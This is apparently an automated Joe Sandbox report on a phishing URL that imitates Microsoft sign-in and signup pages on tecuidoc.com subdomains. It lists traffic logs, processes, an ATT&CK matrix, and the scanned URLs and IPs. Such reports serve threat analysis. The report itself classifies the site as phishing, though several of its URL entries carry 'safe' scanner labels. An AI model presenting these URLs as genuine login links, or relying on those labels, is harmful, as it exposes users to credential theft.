          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
          Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
          Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
          Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
          Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
          Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
          Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
          Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
          Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
          Source: unknownNetwork traffic detected: HTTP traffic on port 49698 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
          Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
          Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
          Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
          Source: unknownHTTPS traffic detected: 23.204.76.112:443 -> 192.168.2.6:49709 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 23.204.76.112:443 -> 192.168.2.6:49711 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 173.222.162.64:443 -> 192.168.2.6:49698 version: TLS 1.2
          Source: classification engineClassification label: mal60.phis.win@17/69@30/4
          Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2264 --field-trial-handle=2212,i,6787345325031674847,628112371274147507,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
          Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://srmcorp.tecuidoc.com/?PSZlk=ViP"
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2264 --field-trial-handle=2212,i,6787345325031674847,628112371274147507,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://srmcorp.tecuidoc.com/?PSZlk=ViP"Jump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeAutomated click: Next
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeAutomated click: Next
          Source: Window RecorderWindow detected: More than 3 window changes detected
          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity Information1
          Scripting
          1
          Drive-by Compromise
          Windows Management Instrumentation1
          Scripting
          1
          Process Injection
          1
          Process Injection
          OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
          Encrypted Channel
          Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
          Non-Application Layer Protocol
          Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
          Application Layer Protocol
          Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
          Ingress Tool Transfer
          Traffic DuplicationData Destruction
          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand
          SourceDetectionScannerLabelLink
          https://srmcorp.tecuidoc.com/?PSZlk=ViP0%Avira URL Cloudsafe
          No Antivirus matches
          No Antivirus matches
          No Antivirus matches
          SourceDetectionScannerLabelLink
          https://bd6a002d-7d4f53f3.tecuidoc.com/lwsignupstringscountrybirthdate_en-us_gdxUIqa3ijrOefuBnwhTKg2.js?v=10%Avira URL Cloudsafe
          https://7e55e394-7d4f53f3.tecuidoc.com/shared/1.0/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico0%Avira URL Cloudsafe
          https://signup.tecuidoc.com/handlers/Watson0%Avira URL Cloudsafe
          https://7e55e394-7d4f53f3.tecuidoc.com/shared/1.0/content/images/backgrounds/2_11d9e3bcdfede9ce5ce5ace2d129f1c4.svg0%Avira URL Cloudsafe
          https://srmcorp.tecuidoc.com/favicon.ico0%Avira URL Cloudsafe
          https://7e55e394-7d4f53f3.tecuidoc.com/shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg0%Avira URL Cloudsafe
          https://7e55e394-7d4f53f3.tecuidoc.com/shared/1.0/content/images/marching_ants_white_8257b0707cbe1d0bd2661b80068676fe.gif0%Avira URL Cloudsafe
          https://bd6a002d-7d4f53f3.tecuidoc.com/watson_DOaS_v-h3FCKtNPQv8zSLw2.js?v=10%Avira URL Cloudsafe
          https://l1ve.tecuidoc.com/oauth20_authorize.srf?scope=openid+profile+email+offline_access&response_type=code&client_id=51483342-085c-4d86-bf88-cf50c7252078&response_mode=form_post&redirect_uri=https%3a%2f%2fsrmcorp.tecuidoc.com%2fcommon%2ffederation%2foauth2msa&state=rQQIARAA42Kw0skoKSkottLXL8gvKknM0cvNTC7KL85PK8nPy8nMS9VLzs_Vyy9Kz0wBsYqEuAS-2C5ti-584NIeJumk-uG95ixGzviczDKwylWMyoSN07_AyPiCkfEWk6B_UbpnSnixW2pKalFiSWZ-3gUWgVcsPAbMVhwcXAIMEgwKDD9YGBexAm3VWO3s1Lcnw31_0fR5LYUijKdY9bMyUtxSLVJcS1Mz3V1TAnP1i1MrUqPcIgPTi6tSMyIqDSL0XXzdQzySfIptDa0MJ7AJTWBjOsXG8IGNsYOdYRY7wwFOxg08jAd4GX7wtW_9OXXigZnvPF7x6wSUhie6VVRFuYdblhXkm-Z5umtHOZunBQWVuZhUpOlHhUQ5O3qmOGa7p-XbbhBgAAA1&estsfed=1&uaid=86a53df4895b44e08756194225f0ef29&signup=1&lw=1&fl=easi2&fci=https%3a%2f%2f0a413710-7d4f53f3.tecuidoc.com.orgid.com0%Avira URL Cloudsafe
          https://7457d826-7d4f53f3.tecuidoc.com/api/report?catId=GW+estsfd+ams20%Avira URL Cloudsafe
          https://bd6a002d-7d4f53f3.tecuidoc.com/converged_ux_v2_nBE5FSqn9KpH44ZlTc3VqQ2.css?v=10%Avira URL Cloudsafe
          https://7e55e394-7d4f53f3.tecuidoc.com/shared/1.0/content/images/signin-options_3e3f6b73c3f310c31d2c4d131a8ab8c6.svg0%Avira URL Cloudsafe
          https://7e55e394-7d4f53f3.tecuidoc.com/ests/2.1/content/cdnbundles/converged.v2.login.min_1ito3russhq-9gioj-zd4w2.css0%Avira URL Cloudsafe
          https://7e55e394-7d4f53f3.tecuidoc.com/shared/1.0/content/js/asyncchunk/convergedlogin_pcustomizationloader_7f0a8c2a247460fad87f.js0%Avira URL Cloudsafe
          https://signup.tecuidoc.com/Resources/images/2_vD0yppaJX3jBnfbHF1hqXQ2.svg0%Avira URL Cloudsafe
          https://bd6a002d-7d4f53f3.tecuidoc.com/images/microsoft_logo_7lyNn7YkjJOP0NwZNw6QvQ2.svg0%Avira URL Cloudsafe
          https://bd6a002d-7d4f53f3.tecuidoc.com/images/2_vD0yppaJX3jBnfbHF1hqXQ2.svg0%Avira URL Cloudsafe
          https://bd6a002d-7d4f53f3.tecuidoc.com/datarequestpackage_h-_7C7UzwdefXJT9njDBTQ2.js0%Avira URL Cloudsafe
          https://l1ve.tecuidoc.com/login.srf?wa=wsignin1.0&rpsnv=150&checkda=1&ct=1714143430&rver=7.5.2156.0&wp=MBI_SSL&wreply=https%3A%2F%2Fsignup.tecuidoc.com%2Fsignup%3Fsru%3Dhttps%253a%252f%252fl1ve.tecuidoc.com%252foauth20_authorize.srf%253flc%253d1033%2526client_id%253d51483342-085c-4d86-bf88-cf50c7252078%2526mkt%253dEN-US%2526opid%253dB6E95959DB8DBA86%2526opidt%253d1714143427%2526uaid%253d86a53df4895b44e08756194225f0ef29%2526contextid%253d5ABD0222F1D086D5%2526opignore%253d1%26mkt%3DEN-US%26uiflavor%3Dweb%26lw%3D1%26fl%3Deasi2%26client_id%3D51483342-085c-4d86-bf88-cf50c7252078%26uaid%3D86a53df4895b44e08756194225f0ef29%26suc%3Dhttps%253a%252f%252f0a413710-7d4f53f3.tecuidoc.com.orgid.com%26lic%3D1&lc=1033&id=68692&mkt=en-US&uaid=86a53df4895b44e08756194225f0ef290%Avira URL Cloudsafe
          https://bd6a002d-7d4f53f3.tecuidoc.com/oneds_MC5gQfpbTUjLu60sQCwU1w2.js?v=10%Avira URL Cloudsafe
          https://bd6a002d-7d4f53f3.tecuidoc.com/lightweightsignuppackage_9itStK--DdHYjkMJSN7X3A2.js?v=10%Avira URL Cloudsafe
          https://l1ve.tecuidoc.com/Me.htm?v=30%Avira URL Cloudsafe
          https://7e55e394-7d4f53f3.tecuidoc.com/shared/1.0/content/js/asyncchunk/convergedlogin_pstringcustomizationhelper_eb638da25d4055fbbb57.js0%Avira URL Cloudsafe
          https://signup.tecuidoc.com/signup?sru=https://l1ve.tecuidoc.com/oauth20_authorize.srf%3flc%3d1033%26client_id%3d51483342-085c-4d86-bf88-cf50c7252078%26mkt%3dEN-US%26opid%3dB6E95959DB8DBA86%26opidt%3d1714143427%26uaid%3d86a53df4895b44e08756194225f0ef29%26contextid%3d5ABD0222F1D086D5%26opignore%3d1&mkt=EN-US&uiflavor=web&lw=1&fl=easi2&client_id=51483342-085c-4d86-bf88-cf50c7252078&uaid=86a53df4895b44e08756194225f0ef29&suc=https://2a9e5726-7d4f53f3.tecuidoc.com0%Avira URL Cloudsafe
          https://bd6a002d-7d4f53f3.tecuidoc.com/jqueryshim_hlu0tTfjWJFWYNt1WZrVqg2.js?v=10%Avira URL Cloudsafe
          https://bd6a002d-7d4f53f3.tecuidoc.com/knockout_3.3.0_X1BYS2jZMbi7hfUj8VuqFA2.js?v=10%Avira URL Cloudsafe
          https://bd6a002d-7d4f53f3.tecuidoc.com/images/favicon.ico?v=20%Avira URL Cloudsafe
          https://bd6a002d-7d4f53f3.tecuidoc.com/jquerypackage_1.10_5V7LAuc3bNAQx2QQfr1RPw2.js?v=10%Avira URL Cloudsafe
          https://7e55e394-7d4f53f3.tecuidoc.com/shared/1.0/content/images/marching_ants_986f40b5a9dc7d39ef8396797f61b323.gif0%Avira URL Cloudsafe
          https://srmcorp.tecuidoc.com/7d4f53f33e0f490ca63a57a3f299e2af/0%Avira URL Cloudsafe
          https://7e55e394-7d4f53f3.tecuidoc.com/shared/1.0/content/js/asyncchunk/convergedlogin_presetpasswordsplitter_3c78f555810791db83a9.js0%Avira URL Cloudsafe
          https://signup.tecuidoc.com/Resources/images/favicon.ico0%Avira URL Cloudsafe
          https://7e55e394-7d4f53f3.tecuidoc.com/shared/1.0/content/js/ConvergedLogin_PCore_jHSrlUosdD1xxbmcR_lMNA2.js0%Avira URL Cloudsafe
          https://eccd3fea-7d4f53f3.tecuidoc.com/shared/1.0/content/js/BssoInterrupt_Core_ChpboAn7HyXj89A22M8mzg2.js0%Avira URL Cloudsafe
          https://bd6a002d-7d4f53f3.tecuidoc.com/datarequestpackage_h-_7C7UzwdefXJT9njDBTQ2.js?v=10%Avira URL Cloudsafe
          https://signup.tecuidoc.com/Resources/images/microsoft_logo_7lyNn7YkjJOP0NwZNw6QvQ2.svg0%Avira URL Cloudsafe
          NameIPActiveMaliciousAntivirus DetectionReputation
          7457d826-7d4f53f3.tecuidoc.com
          198.58.99.33
          truefalse
            unknown
            bd6a002d-7d4f53f3.tecuidoc.com
            198.58.99.33
            truefalse
              unknown
              fp2e7a.wpc.phicdn.net
              192.229.211.108
              truefalse
                unknown
                bg.microsoft.map.fastly.net
                199.232.210.172
                truefalse
                  unknown
                  0a413710-7d4f53f3.tecuidoc.com
                  198.58.99.33
                  truefalse
                    unknown
                    30e9fbb5-7d4f53f3.tecuidoc.com
                    198.58.99.33
                    truefalse
                      unknown
                      a0d99ec0-7d4f53f3.tecuidoc.com
                      198.58.99.33
                      truefalse
                        unknown
                        srmcorp.tecuidoc.com
                        198.58.99.33
                        truefalse
                          unknown
                          l1ve.tecuidoc.com
                          198.58.99.33
                          truefalse
                            unknown
                            www.google.com
                            142.250.217.196
                            truefalse
                              high
                              eccd3fea-7d4f53f3.tecuidoc.com
                              198.58.99.33
                              truefalse
                                unknown
                                a4a4d19d-7d4f53f3.tecuidoc.com
                                198.58.99.33
                                truefalse
                                  unknown
                                  7e55e394-7d4f53f3.tecuidoc.com
                                  198.58.99.33
                                  truefalse
                                    unknown
                                    signup.tecuidoc.com
                                    198.58.99.33
                                    truefalse
                                      unknown
                                      NameMaliciousAntivirus DetectionReputation
                                      https://7e55e394-7d4f53f3.tecuidoc.com/shared/1.0/content/images/backgrounds/2_11d9e3bcdfede9ce5ce5ace2d129f1c4.svgfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://7e55e394-7d4f53f3.tecuidoc.com/shared/1.0/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.icofalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://signup.tecuidoc.com/handlers/Watsonfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://srmcorp.tecuidoc.com/favicon.icofalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://bd6a002d-7d4f53f3.tecuidoc.com/lwsignupstringscountrybirthdate_en-us_gdxUIqa3ijrOefuBnwhTKg2.js?v=1false
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://7e55e394-7d4f53f3.tecuidoc.com/shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svgfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://0a413710-7d4f53f3.tecuidoc.com/Prefetch/Prefetch.aspxfalse
                                        unknown
                                        https://7e55e394-7d4f53f3.tecuidoc.com/shared/1.0/content/images/marching_ants_white_8257b0707cbe1d0bd2661b80068676fe.giffalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://bd6a002d-7d4f53f3.tecuidoc.com/watson_DOaS_v-h3FCKtNPQv8zSLw2.js?v=1false
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://l1ve.tecuidoc.com/oauth20_authorize.srf?scope=openid+profile+email+offline_access&response_type=code&client_id=51483342-085c-4d86-bf88-cf50c7252078&response_mode=form_post&redirect_uri=https%3a%2f%2fsrmcorp.tecuidoc.com%2fcommon%2ffederation%2foauth2msa&state=rQQIARAA42Kw0skoKSkottLXL8gvKknM0cvNTC7KL85PK8nPy8nMS9VLzs_Vyy9Kz0wBsYqEuAS-2C5ti-584NIeJumk-uG95ixGzviczDKwylWMyoSN07_AyPiCkfEWk6B_UbpnSnixW2pKalFiSWZ-3gUWgVcsPAbMVhwcXAIMEgwKDD9YGBexAm3VWO3s1Lcnw31_0fR5LYUijKdY9bMyUtxSLVJcS1Mz3V1TAnP1i1MrUqPcIgPTi6tSMyIqDSL0XXzdQzySfIptDa0MJ7AJTWBjOsXG8IGNsYOdYRY7wwFOxg08jAd4GX7wtW_9OXXigZnvPF7x6wSUhie6VVRFuYdblhXkm-Z5umtHOZunBQWVuZhUpOlHhUQ5O3qmOGa7p-XbbhBgAAA1&estsfed=1&uaid=86a53df4895b44e08756194225f0ef29&signup=1&lw=1&fl=easi2&fci=https%3a%2f%2f0a413710-7d4f53f3.tecuidoc.com.orgid.comfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://7457d826-7d4f53f3.tecuidoc.com/api/report?catId=GW+estsfd+ams2false
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://bd6a002d-7d4f53f3.tecuidoc.com/converged_ux_v2_nBE5FSqn9KpH44ZlTc3VqQ2.css?v=1false
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://7e55e394-7d4f53f3.tecuidoc.com/shared/1.0/content/images/signin-options_3e3f6b73c3f310c31d2c4d131a8ab8c6.svgfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://7e55e394-7d4f53f3.tecuidoc.com/ests/2.1/content/cdnbundles/converged.v2.login.min_1ito3russhq-9gioj-zd4w2.cssfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://7e55e394-7d4f53f3.tecuidoc.com/shared/1.0/content/js/asyncchunk/convergedlogin_pcustomizationloader_7f0a8c2a247460fad87f.jsfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://signup.tecuidoc.com/Resources/images/2_vD0yppaJX3jBnfbHF1hqXQ2.svgfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://bd6a002d-7d4f53f3.tecuidoc.com/images/microsoft_logo_7lyNn7YkjJOP0NwZNw6QvQ2.svgfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://bd6a002d-7d4f53f3.tecuidoc.com/images/2_vD0yppaJX3jBnfbHF1hqXQ2.svgfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://bd6a002d-7d4f53f3.tecuidoc.com/datarequestpackage_h-_7C7UzwdefXJT9njDBTQ2.jsfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://bd6a002d-7d4f53f3.tecuidoc.com/oneds_MC5gQfpbTUjLu60sQCwU1w2.js?v=1false
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://srmcorp.tecuidoc.com/?PSZlk=ViPfalse
                                          unknown
                                          https://l1ve.tecuidoc.com/login.srf?wa=wsignin1.0&rpsnv=150&checkda=1&ct=1714143430&rver=7.5.2156.0&wp=MBI_SSL&wreply=https%3A%2F%2Fsignup.tecuidoc.com%2Fsignup%3Fsru%3Dhttps%253a%252f%252fl1ve.tecuidoc.com%252foauth20_authorize.srf%253flc%253d1033%2526client_id%253d51483342-085c-4d86-bf88-cf50c7252078%2526mkt%253dEN-US%2526opid%253dB6E95959DB8DBA86%2526opidt%253d1714143427%2526uaid%253d86a53df4895b44e08756194225f0ef29%2526contextid%253d5ABD0222F1D086D5%2526opignore%253d1%26mkt%3DEN-US%26uiflavor%3Dweb%26lw%3D1%26fl%3Deasi2%26client_id%3D51483342-085c-4d86-bf88-cf50c7252078%26uaid%3D86a53df4895b44e08756194225f0ef29%26suc%3Dhttps%253a%252f%252f0a413710-7d4f53f3.tecuidoc.com.orgid.com%26lic%3D1&lc=1033&id=68692&mkt=en-US&uaid=86a53df4895b44e08756194225f0ef29false
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://bd6a002d-7d4f53f3.tecuidoc.com/lightweightsignuppackage_9itStK--DdHYjkMJSN7X3A2.js?v=1false
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://l1ve.tecuidoc.com/Me.htm?v=3false
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://7e55e394-7d4f53f3.tecuidoc.com/shared/1.0/content/js/asyncchunk/convergedlogin_pstringcustomizationhelper_eb638da25d4055fbbb57.jsfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://signup.tecuidoc.com/signup?sru=https://l1ve.tecuidoc.com/oauth20_authorize.srf%3flc%3d1033%26client_id%3d51483342-085c-4d86-bf88-cf50c7252078%26mkt%3dEN-US%26opid%3dB6E95959DB8DBA86%26opidt%3d1714143427%26uaid%3d86a53df4895b44e08756194225f0ef29%26contextid%3d5ABD0222F1D086D5%26opignore%3d1&mkt=EN-US&uiflavor=web&lw=1&fl=easi2&client_id=51483342-085c-4d86-bf88-cf50c7252078&uaid=86a53df4895b44e08756194225f0ef29&suc=https://2a9e5726-7d4f53f3.tecuidoc.comfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://bd6a002d-7d4f53f3.tecuidoc.com/jqueryshim_hlu0tTfjWJFWYNt1WZrVqg2.js?v=1false
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://bd6a002d-7d4f53f3.tecuidoc.com/knockout_3.3.0_X1BYS2jZMbi7hfUj8VuqFA2.js?v=1false
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://bd6a002d-7d4f53f3.tecuidoc.com/jquerypackage_1.10_5V7LAuc3bNAQx2QQfr1RPw2.js?v=1false
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://bd6a002d-7d4f53f3.tecuidoc.com/images/favicon.ico?v=2false
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://7e55e394-7d4f53f3.tecuidoc.com/shared/1.0/content/images/marching_ants_986f40b5a9dc7d39ef8396797f61b323.giffalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://srmcorp.tecuidoc.com/7d4f53f33e0f490ca63a57a3f299e2af/false
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://7e55e394-7d4f53f3.tecuidoc.com/shared/1.0/content/js/asyncchunk/convergedlogin_presetpasswordsplitter_3c78f555810791db83a9.jsfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://signup.tecuidoc.com/Resources/images/favicon.icofalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://srmcorp.tecuidoc.com/?PSZlk=ViP&sso_reload=truetrue
                                            unknown
                                            https://eccd3fea-7d4f53f3.tecuidoc.com/shared/1.0/content/js/BssoInterrupt_Core_ChpboAn7HyXj89A22M8mzg2.jsfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://7e55e394-7d4f53f3.tecuidoc.com/shared/1.0/content/js/ConvergedLogin_PCore_jHSrlUosdD1xxbmcR_lMNA2.jsfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://bd6a002d-7d4f53f3.tecuidoc.com/datarequestpackage_h-_7C7UzwdefXJT9njDBTQ2.js?v=1false
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://signup.tecuidoc.com/Resources/images/microsoft_logo_7lyNn7YkjJOP0NwZNw6QvQ2.svgfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://signup.tecuidoc.com/signup?sru=https%3a%2f%2fl1ve.tecuidoc.com%2foauth20_authorize.srf%3flc%3d1033%26client_id%3d51483342-085c-4d86-bf88-cf50c7252078%26mkt%3dEN-US%26opid%3dB6E95959DB8DBA86%26opidt%3d1714143427%26uaid%3d86a53df4895b44e08756194225f0ef29%26contextid%3d5ABD0222F1D086D5%26opignore%3d1&mkt=EN-US&uiflavor=web&lw=1&fl=easi2&client_id=51483342-085c-4d86-bf88-cf50c7252078&uaid=86a53df4895b44e08756194225f0ef29&suc=https%3a%2f%2f2a9e5726-7d4f53f3.tecuidoc.com&lic=1false
                                              unknown
                                              • No. of IPs < 25%
                                              • 25% < No. of IPs < 50%
                                              • 50% < No. of IPs < 75%
                                              • 75% < No. of IPs
                                              IPDomainCountryFlagASNASN NameMalicious
                                              198.58.99.33
                                              7457d826-7d4f53f3.tecuidoc.comUnited States
                                              63949LINODE-APLinodeLLCUSfalse
                                              142.250.217.196
                                              www.google.comUnited States
                                              15169GOOGLEUSfalse
                                              239.255.255.250
                                              unknownReserved
                                              unknownunknownfalse
                                              IP
                                              192.168.2.6
                                              Joe Sandbox version:40.0.0 Tourmaline
                                              Analysis ID:1432193
                                              Start date and time:2024-04-26 16:55:21 +02:00
                                              Joe Sandbox product:CloudBasic
                                              Overall analysis duration:0h 3m 28s
                                              Hypervisor based Inspection enabled:false
                                              Report type:full
                                              Cookbook file name:browseurl.jbs
                                              Sample URL:https://srmcorp.tecuidoc.com/?PSZlk=ViP
                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                              Number of analysed new started processes analysed:6
                                              Number of new started drivers analysed:0
